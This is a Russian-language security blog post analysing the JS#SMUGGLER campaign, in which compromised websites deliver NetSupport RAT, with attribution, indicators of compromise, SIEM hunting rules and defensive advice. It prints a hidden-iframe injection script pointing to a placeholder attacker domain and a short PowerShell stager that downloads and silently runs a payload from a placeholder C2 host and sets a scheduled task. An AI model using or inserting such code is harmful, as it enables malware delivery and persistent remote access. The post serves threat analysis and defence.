// Безопасность / Веб

Кампания JS#SMUGGLER: продвинутая многоэтапная атака использует взломанные сайты для распространения NetSupport RAT

NetSupport RAT

Кампания JS#SMUGGLER: продвинутая многоэтапная атака использует взломанные сайты для распространения NetSupport RAT

Исследователи в области информационной безопасности выявили сложную кампанию по распространению вредоносного ПО под названием JS#SMUGGLER, которая использует взломанные легитимные сайты для распространения NetSupport RAT. Данная кампания применяет таргетинг на основе типа устройства, сильно обфусцированные JavaScript-загрузчики и безфайловое выполнение, чтобы обходить средства защиты и обеспечивать постоянный удалённый доступ к системам жертв.


Понимание угрозы JS#SMUGGLER

Киберпространство столкнулось с появлением исключительно продвинутой вредоносной кампании, демонстрирующей качественный скачок в методах веб-атак. Кампания, получившая обозначение JS#SMUGGLER по классификации исследователей Securonix, демонстрирует следующие ключевые характеристики:

  • многоэтапную доставку полезной нагрузки,
  • адаптацию к окружению жертвы,
  • продвинутые механизмы антианализа,
  • устойчивость к современным средствам защиты.

В отличие от классических атак через фишинг и вредоносные вложения, JS#SMUGGLER использует взломанные легитимные сайты как векторы распространения, что:

  • значительно повышает вероятность заражения,
  • использует доверие пользователей к известным ресурсам,
  • сильно усложняет атрибуцию и блокировку инфраструктуры атакующих.

Кампания ориентирована преимущественно на корпоративных пользователей по всему миру, без жёсткой привязки к конкретным отраслям. Финальная полезная нагрузка — NetSupport RAT, предоставляющий атакующим:

  • полный удалённый контроль,
  • кражу учётных данных,
  • манипуляции с файлами,
  • эксфильтрацию данных.

Анатомия компрометации сайтов

Основа атаки — заражение легитимных сайтов, которые затем используются как точки распространения вредоносного кода.

Преимущество атакиОписаниеВлияние на обнаружение
Эксплуатация доверенных доменовИспользуются сайты с хорошей репутациейВысокое — обход фильтров URL
Корректные SSL-сертификатыВредонос передаётся по HTTPSВысокое — выглядит как безопасный трафик
Сложность атрибуцииИнфраструктура отделена от атакующихСреднее
Постоянное распространениеСайт работает легитимно и заражаетВысокое
Эксплуатация доверия пользователейВероятность клика вышеВысокое

Методы взлома сайтов включают:

  • уязвимости CMS,
  • компрометацию админ-аккаунтов,
  • атаки на плагины,
  • SQL-инъекции.

Технический разбор многоэтапной цепочки заражения


Этап 1: Внедрение вредоносного JavaScript

При заходе на взломанный сайт пользователь незаметно получает скрытую загрузку через:

  • iframe,
  • JavaScript-редиректы.

Злоумышленники подгружают файл:

phone.js — с внешнего домена атакующих.

<script>
(function() {
  var iframe = document.createElement('iframe');
  iframe.style.display = 'none';
  iframe.src = 'https://attacker-domain[.]com/phone.js';
  document.body.appendChild(iframe);
})();
</script>

Этап 2: Профилирование устройства

JavaScript определяет тип устройства:

КритерийМобильное устройствоДесктоп
User-AgentМобильная версия iframeВторичный payload
Разрешение экранаАдаптация под мобильные экраныМинимальный визуальный след
Поддержка touchВключает сенсорОтслеживает мышь/клавиатуру
Возможности платформыРедиректHTA + PowerShell

Антианализ: вредонос запускается только при первом посещении.


Этап 3: Формирование HTA-загрузчика

HTA-файл запускается через mshta.exe:

КомпонентФункцияМаскировка
mshta.exeИсполнение HTAЛегитимный бинар
ОкноСкрываетсяПользователь ничего не видит
PowerShellЗаписывается временноСледы минимальны
ВыполнениеВ памятиОбход сигнатур
СамоуничтожениеУдаляет файлУничтожение артефактов

Этап 4: PowerShell-стейджер и загрузка NetSupport RAT

$url = "https://c2-domain[.]com/payload.bin"
$output = "$env:TEMPservice.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process $output -WindowStyle Hidden

Register-ScheduledTask -TaskName "SystemService"

Методы закрепления:

  • Autostart,
  • Scheduled Tasks,
  • Реестр.

NetSupport RAT — полный контроль над системой

КатегорияВозможностиРиски
Удалённый доступПолный контрольЗахват станции
Кража данныхФайлы, браузер, почтаУтечки
СлежкаКейлоггер, камера, микрофонШпионаж
СетьСканирование, проксиРасширение атаки
Загрузка вредоносаRansomware, трояныМассовые заражения

⚠️ Критический риск: любая система с NetSupport RAT считается полностью скомпрометированной.


Атрибуция и Threat Intelligence

ПараметрЗначение
АкторSmartApeSG
Альтернативные именаHANEYMANEY, ZPHP
Первое появлениеКонец 2024
МетодыJavaScript-инъекции, RAT
Инфраструктураboriver[.]com
МотивацияФинансовая
УровеньВысокий

Связанная кампания CHAMELEON#NET

ФакторJS#SMUGGLERCHAMELEON#NET
ВекторВзломанные сайтыФишинг
Начальный этапphone.jsBZ2 архив
ПромежуточныйHTAVB.NET
ФиналNetSupport RATFormbook
МетодыFilelessReflective
ЦелиКорпорацииСоцсектор

IOC — индикаторы компрометации

ТипЗначениеКонтекстУверенность
Доменboriver[.]comРаспространениеВысокая
Файлphone.jsJS-загрузчикВысокая
Процессmshta.exeHTAСредняя
Поведениеmshta → PowerShellЦепочка атакиВысокая
ПланировщикSystem TaskЗакреплениеСредняя
Сеть5400/5405/443C2Высокая

Detection & Hunting-правила (SIEM/EDR)

ParentImage ENDS_WITH "mshta.exe"
AND Image ENDS_WITH "powershell.exe"

CommandLine CONTAINS "windowstyle hidden"

EventID == 4698 AND TaskName CONTAINS "System"

NetworkConnection AND DestinationPort IN (5400, 5405, 443)

Защита сайтов от компрометации

  • регулярные обновления CMS,
  • MFA для админов,
  • File Integrity Monitoring,
  • Pentest и аудит,
  • Subresource Integrity,
  • WAF и CSP.

Реагирование на инциденты

ФазаДействияСрок
ИзоляцияОтключение, блокировка IOC30 мин
МасштабОпределение всех заражённых2 ч
ФорензикаДампы, образы4 ч
УдалениеЧистка, патчи24 ч
ВосстановлениеBackup, reset48 ч
Post-mortemАнализ, улучшения7 дней

Стратегические рекомендации

  • Zero Trust,
  • Threat Intelligence,
  • SOAR,
  • User awareness,
  • Proactive Vulnerability Management.

Эволюция веб-малвари

  • уход от email к сайтам,
  • device-aware вредонос,
  • fileless-атаки,
  • злоупотребление легитимными RAT,
  • многоэтапные цепочки.

Вывод

Кампания JS#SMUGGLER демонстрирует новый уровень веб-атак, где:

  • сайт становится оружием,
  • легитимные инструменты — инструментом взлома,
  • присутствие RAT означает полный захват.

Эта кампания — сигнал для бизнеса, что:

взлом сегодня начинается не с письма, а с браузера.

Профильные услуги SecurityLab: тестирование на проникновение · пентест веб-приложений · Готовность к шифровальщикам.

← назад в блог